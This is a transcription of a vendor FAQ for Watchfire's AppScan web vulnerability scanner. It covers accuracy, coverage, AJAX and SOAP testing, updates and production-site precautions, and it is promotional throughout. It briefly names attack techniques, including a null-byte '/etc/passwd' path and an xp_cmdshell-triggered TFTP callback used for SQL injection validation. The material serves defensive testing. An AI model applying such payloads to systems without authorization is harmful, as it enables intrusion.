Copyright Watchfire Corporation. All Rights Reserved.

Transcription

1 AppScan Frequently Asked Technical Questions 1. How is AppScan different from other web application scanners? (p. 2) 2. How do I know if I ve covered all of my applications? (p. 3) 3. How is AppScan different from code scanners? (p. 4) 4. Can AppScan test AJAX-based web applications? (p. 5) 5. Does AppScan extract links from JavaScripts and Flash files? (p. 5) 6. Can AppScan test SOAP web services for security issues? (p. 6) 7. How does AppScan update its database of attacks and attack techniques? (p. 6) 8. How many tests does AppScan s database contain? (p. 6) 9. Can I use AppScan on live production web applications, or will it damage/hurt the site? (p. 7) 10. Where does AppScan get its "Fix Recommendation" text from? (p. 8) 11. What kinds of web application technologies (e.g., ASP.NET, J2EE, PHP, etc.) does AppScan support? (p. 8) 12. Can I manually tamper with HTTP requests like I do with free tools like Paros, Burp-Proxy, and WebScarab? How different is AppScan from these free tools? (p. 8) 13. Is there a way for me to add my own tests to AppScan's database? Can I also write my own advisories? (p. 9) 14. If I have a Web Application Firewall installed, do I need to scan my application with AppScan? (p. 10) Copyright Watchfire Corporation. All Rights Reserved.

2 1. Q: How is AppScan different from other web application scanners? A: The main differentiators between AppScan and other scanners are: a. Test Accuracy: the most important trait of a security scanner is its accuracy. Watchfire s patented AppScan software contains the industry s most advanced scanning engine. Accuracy is achieved in several ways, one of which is real-world hacker technique imitation. During the explore phase of application scanning, AppScan will collect information about parameters, and will use this information to specifically tailor the tests it creates to your application. For example: AppScan will add or decrease numeric values out of their observed ranges (e.g., if a parameter called DocumentID was seen with a range of values between 10 to 100, AppScan will attempt to send the values 9 and 101. This is a known web hacking technique that attempts to access resources without authorization). AppScan will attempt to manipulate select-parameters' (pulldown menus) values out of their possible ranges. During a Poison-null byte attack, AppScan will use the original file extension (i.e., /etc/passwd%00.ext where ext is the original file extension that was seen in the original parameter value), in order to bypass validation procedures. When attempting to manipulate a price-parameter (for eshoplifting attacks), AppScan will keep the original price format (e.g., if the original hidden price parameter value was $199.99USD, AppScan will attempt to change the value, but keep the format - $1.99USD). AppScan is the only scanner to incorporate a "Port Listener" validation mechanism. The Port Listener enables AppScan to detect vulnerabilities, such as SQL Injection, with high certainty (where applicable) by using out-of-bounds communications. This validation mimics a known hacker technique, of executing commands on the backend server. For example, when testing an application that uses MS-SQL database for SQL Injection, AppScan will attempt to execute the XP_CMDSHELL stored procedure, which will then issue a TFTP request back to AppScan. When the TFTP request reaches AppScan back, the test will be flagged as successful. b. Scan Performance: customers have reported that in head-to-head comparisons AppScan s scanning speed performs up to 5 times faster than competitive solutions. c. Product Maturity: AppScan is currently the most mature web application scanner in the market (first version of AppScan was released in 2000). Copyright Watchfire Corporation. All Rights Reserved. 2

3 Gartner recently named Watchfire the worldwide market-share leader in the web vulnerability assessment market with more than twice the market share of any competitor. ( IDC recently named Watchfire as the worldwide market-share leader in the Web Application Security Assessment software category. ( d. Actionable Results: AppScan's advisories contain both ASP.NET and J2EE source code examples, which will help in educating developers on how to solve complex security issues, using "best practices" methodologies. The Remediation View of results enables AppScan users to better communicate scan results to developers in an actionable and consolidated report. All fix recommendations are grouped together according to the problematic part of the application, and according to the code fix that is required, and are presented in a task-list manner so that developers don't have to read through hundreds of pages of security reports. 2. Q: How do I know if I covered all of my applications? A: AppScan provides users with several indications of the areas and parts of the web application that were covered during a scan: a. Application Tree: the Application Tree (in AppScan's user interface), is a graphical representation of the areas that were discovered and explored by AppScan. Users can validate that AppScan covered the whole application by viewing this tree and making sure that no application segments were left undiscovered. b. Application Data: the Application Data view (accessed using the View Selector in AppScan's user interface), is a repository of information and data about the structure and contents discovered about the application during the explore phase. This data contains: Visited URLs: URLs that were visited during the explore phase Script Parameters: input parameters sent to the application, such as text fields, radio button values, hidden parameters, link parameters, etc. Interactive URLs: forms, which were not automatically submitted, and require user interaction Copyright Watchfire Corporation. All Rights Reserved. 3

4 Broken Links: links that AppScan cannot retrieve (either because they are missing, or because the application returned an error during the explore phase) Filtered URLs: URLs that were not explored due to explore filters (e.g., path exclusions, file type exclusions, depth limit, etc.) Comments: HTML comments extracted from each page that were discovered during the explore phase JavaScripts: JavaScript code that was extracted from each page that was discovered during the explore phase Cookies: HTTP cookies that were used during the explore phase (set either by a "Set-Cookie" header, or by client-side technologies such as JavaScript) Both the Application Tree and Application Data view enable users to easily understand if AppScan covered all of the application during the scan. 3. Q: How is AppScan different from code scanners? A: Testing software for security issues can be done at three different stages of the application development lifecycle. You can scan the source code before you compile it (static code analysis), you can scan the compiled code before you build the whole application (dynamic code analysis), or you can scan the application once it has been built (Blackbox scanning). Code scanners (Whitebox scanners) are a group of tools that receive pre-built software and test it for functionality and security problems within the code. In general, there are two types of code analysis techniques: Static code analysis Dynamic (runtime) analysis Static code analyzers mainly use text pattern matching techniques in order to easily locate problems within the source code. These scanners are somewhat simplistic and prone to missing many issues due in part to the fact that they cannot follow the application's flow. Dynamic (runtime) analyzers are more complex scanners and can find flaws in the application that static analyzers cannot detect. Their main problem is that they are farther away from the actual code, so locating the specific line in the code where the problem has occurred is sometimes difficult. AppScan, on the other hand, uses a Blackbox approach to scanning applications. This approach treats the application as a "Blackbox," and attempts to interact with it like a user (or a hacker) would. Testing is done by attempting to manipulate the Copyright Watchfire Corporation. All Rights Reserved. 4

5 input sent to the application and analyzing the output in order to locate security or functionality issues. The biggest advantage of the Blackbox approach is accuracy. Vulnerabilities that are discovered using AppScan are always real. In code scanning, not all issues that are discovered can be exploited by users of the applications. Some of these issues are only theoretical. In addition, since AppScan can run against the web application when it is installed in its designated production environment, it can also detect vulnerabilities that are related to that specific environment, such as: Known vulnerabilities in components such as the web servers, application servers, XML or SOAP parsers, etc. Vulnerabilities that are caused due to improper configuration and settings Vulnerabilities in the application's logic, which can only be detected by looking at the application as a whole when it is running To sum things up, AppScan and code scanners perform security testing in different layers, and they complement each other. 4. Q: Can AppScan test AJAX-based web applications? A: Yes. Since AJAX itself is the technology that runs on the client side, all of the testing techniques (e.g., SQL Injection, XSS, Buffer Overflows, etc.) are still relevant. In addition, when performing automatic crawling of an AJAX-based web application, AppScan will execute JavaScript code (assuming that JavaScript execution is enabled), and will automatically send requests that were created by XMLHttpRequest objects. Finally, AppScan users who prefer to traverse the AJAX application manually can do so by using AppScan's embedded browser, just like they do with a regular browser. 5. Q: Does AppScan extract links from JavaScripts and Flash files? A: Yes. AppScan can extract links from JavaScript code in order to discover new areas of the site by using three different techniques: JavaScript Execution: AppScan will execute JavaScript code and analyze the results to collect links, including dynamic links that may not be discovered by parsing alone. Static JavaScript Code Analysis: AppScan will statically parse JavaScript code, looking for new links. Flash File Link Extractions: AppScan will parse Flash files, looking for new links. Copyright Watchfire Corporation. All Rights Reserved. 5

6 6. Q: Can AppScan test SOAP web services for security issues? A: Yes. AppScan v7.0 enables users to perform Web Services scanning, using the Web Services Explorer, a graphical utility that invokes Web Services and lets users interact with them. The Web Services Explorer reads your Web Service s WSDL file and displays the individual services and methods available in a simple tree format, enabling you to input parameters and view the responses. It can do this either as a standalone program or in conjunction with AppScan and using it as the proxy. This second option enables AppScan to create tests for the service based on your input. In addition, AppScan s test database contains many tests for SOAP web services. The tests can be divided into three main groups: a. Tests for SOAP/XML Parsers: tests that attack the SOAP or XML parser component b. Application-layer Tests: these are similar to regular web application tests, such as SQL Injections, XSS, Buffer Overflows, etc. c. Known Vulnerabilities: these are known problems related to Web Services technologies. 7. Q: How does AppScan update its database of attacks and attack techniques? A: AppScan's database of attacks and attack techniques can be updated through the "Live Update" feature. This feature allows you to decide if you want to receive updates whenever AppScan is launched ("Check for updates on startup" in AppScan's options), or by pressing the "Check for updates" button. Once the update process ends, updates are automatically installed in AppScan, and information regarding the specific update will appear in the "Updates log" (Help Updates Log). New updates are available several times a week. Special updates are provided when needed (e.g., discovery of critical vulnerabilities). 8. Q: How many tests does AppScan's database contain? A: AppScan's database contains thousands of tests which cover all categories of the WASC (Web Application Security Consortium) Threat Classification. Since updates are issued several times a week, the exact number of tests changes rapidly. Updates for new attacks are added by: a. Monitoring numerous web application security resources (newsgroups, mailing lists, etc.) Copyright Watchfire Corporation. All Rights Reserved. 6

7 b. Monitoring hackers websites for new 0-day attacks c. Proprietary research performed by Watchfire's Security Team 9. Q: Can I use AppScan on live production web applications, or will it damage/hurt the site? A: Yes, you can use AppScan to test live production web applications, but here are several issues that need to be taken into consideration when scanning such a website: Possible overloading of the web application. The application might not be able to handle the amount of HTTP requests sent by AppScan in such a short time. Your live production database may be filled with "non-real" information as a result of the automatic crawling and automatic form filling performed by AppScan A large amount of s or other notifications may be sent to the administrator or site moderator as a result of the automatic crawling and automatic form filling performed by AppScan. There are several actions you can take in order to reduce the impact on a live production web application: a. Turn off the "Invasive" tests (Scan Configuration Test Policy): doing so will ensure that no Denial of Service, or other tests that might cause the application or web server to crash (e.g., Buffer Overflows), are sent. Important note: Web applications often contain vulnerabilities that will only be discovered by AppScan's "Invasive" tests. Watchfire highly recommends that you test your application for these kinds of vulnerabilities and that you do so in coordination with your site owner or administrator. You should also consider performing these tests during offpeak hours when the application is likely to be idle. b. Turn off the "Automatic Form Filler" (Scan Configuration User Input): will ensure that AppScan does not fill forms automatically and submit information that might flood a database, bulletin board, online forum systems or send s to an administrator/moderator account. Important note: turning the "Automatic Form Filler" off may limit AppScan's ability to reach certain areas of the site which are best accessed by submitting forms. In this mode of operation, AppScan will only access areas of the site that can be accessed by following links (with or without parameters). Copyright Watchfire Corporation. All Rights Reserved. 7

8 c. Throttle down AppScan's scan speed by reducing the amount of threads used (Scan Configuration Communication Number of Threads) 10. Q: Where does AppScan get its "Fix Recommendation" text from? A: The fix recommendations in AppScan are written as a part of each test's advisory. Unlike other tools, AppScan's advisories are written in-house, and are not copied as is from public resources. Each test (and fix recommendation(s)) that is added to AppScan is first researched by Watchfire's Security Team and validated before it is added to the next product update. 11. Q: What kinds of web application technologies (e.g., ASP.NET, J2EE, PHP, etc.) does AppScan support? A: In general, since AppScan treats the web application as a "Blackbox" (see Question 3,"How is AppScan different from Code Scanners"), it is usually technologyagnostic. AppScan interacts with the web application like a user would, without caring about the underlying programming language or application technology. In several cases, AppScan does attempt to detect the web technologies used by your application in order to modify and adapt specific tests, so that they will have better chances of succeeding. For example, when trying to download system files, AppScan will attempt certain techniques for Windows-based applications, and different techniques for UNIX-based (or any other OS) systems. In addition, some of AppScan's "Infrastructure" tests (known vulnerabilities) are sent according to the underlying technology that was detected during the explore phase. Note: users can choose to disable automatic server detection and launch all of the infrastructure tests, without paying attention to AppScan's automatic detection (Scan Configuration Application Automatic Server Detection), but this is not recommended in most cases, as it may cause inaccuracies in the results. 12. Q: Can I manually tamper with HTTP requests like I do with free tools like Paros, Burp-Proxy, and WebScarab? How different is AppScan from these free tools? A: Of course. You can manually tamper with any part of the HTTP request by using AppScan's "Manual Test" utility. You can use this utility for: a. Manipulating "valid" HTTP requests that were sent to the application during the explore phase. This can be done by switching to the "Application Data" view, choosing a specific request in the Visited URLs, and then right-clicking on the URL and choosing "Manual Test" (or just by clicking on the "Manual Test" button). Copyright Watchfire Corporation. All Rights Reserved. 8

9 b. Manipulating test HTTP requests (creating your own "user defined" tests). This can be done by switching to the "Issues" view, choosing a specific issue, drilling down to a specific test variant and either rightclicking on the vulnerable element and choosing "Manual Test", or through the Tools Manual Test menu. AppScan's "Manual Test" utility has several important advantages over other HTTP testing tools: a. AppScan will automatically handle the application's login process for you. You don't have to log into the application in order to manually test parts of the application that are behind the login mechanism. b. AppScan will automatically handle SSL encryption for you, including the usage of SSL client side certificates. c. AppScan will automatically calculate the "Content-Length" HTTP header for you when applicable (e.g., when manipulating HTTP POST requests). In addition, if you still want to use an HTTP proxy for intercepting HTTP requests and responses, you can download and use "HTTP Proxy," which is one of Watchfire's free PowerTools at: Q: Is there a way for me to add my own tests to AppScan's database? Can I also write my own advisories? A: Definitely. AppScan users can add their own new tests by using AppScan's "User Defined Tests" feature. This feature allows the addition of Application-specific tests (e.g., Parameter Tampering tests), Infrastructure tests (known vulnerabilities) or Pattern searching tests (e.g. locate certain text in all responses). The addition of new tests is done through a simple wizard, which is accessed through the Tools User Defined Tests menu. For each new test that you add, you can also set its relevant information, such as: Test name Test advisory (impact, description, fix recommendation, etc) Test severity level Test validation criteria (when is this test considered successful) User Defined Tests persist across scans, and you can turn them on or off according to your needs. Copyright Watchfire Corporation. All Rights Reserved. 9

10 14. Q: If I have a Web Application Firewall installed, do I need to scan my application with AppScan? A: Achieving good security (physical, network and/or application), is all about adding more and more layers of protection. There is no silver bullet solution for security. Let's take network security as an example everyone knows that you shouldn't leave a server un-patched, even if it is behind a firewall, because if the firewall is not configured properly, or if someone manages to bypass the firewall, then the server is left totally exposed. Application security is not much different - it's all about adding more and more layers of protection. You can scan the source code in order to make sure that the code is robust and doesn't contain low-level problems (such as buffer overflows), you can scan the web application using a Blackbox approach (using AppScan) to help ensure that problems such as SQL Injection, XSS, other kinds of parameter tampering attacks and even logical problems do not exist. And you can also use an application firewall in order to supply another layer of protection in front of the application. In addition, since Application Firewalls are a complex piece of software, which require a lot of configuration, they are error prone. Using AppScan together with a web application firewall provides assurance that your Application Firewall has been properly configured. About Watchfire Watchfire provides Online Risk Management software and services to help ensure the security and compliance of websites. More than 500 enterprises and government agencies, including AXA Financial, SunTrust, HSBC, Vodafone, Veterans Affairs and Dell rely on Watchfire to audit and report on issues impacting their online business. Watchfire has been the recipient of several industry honors including the HP/IAPP Privacy Innovation Award, InfoSecurity Product Guide s Hot Security Company 2006, Computerworld s Innovative Technology Award, and Recommended rating by Computer Reseller News. Watchfire was named by Gartner and IDC as the worldwide market-share leader in web application vulnerability assessment software. Watchfire's partners IBM Global Services, Sapient, WebTrends, PricewaterhouseCoopers, Fortify, Microsoft, Interwoven, EMC Documentum and Mercury. Watchfire is headquartered in Waltham, MA. For more information, please visit Copyright Watchfire Corporation. All Rights Reserved. 10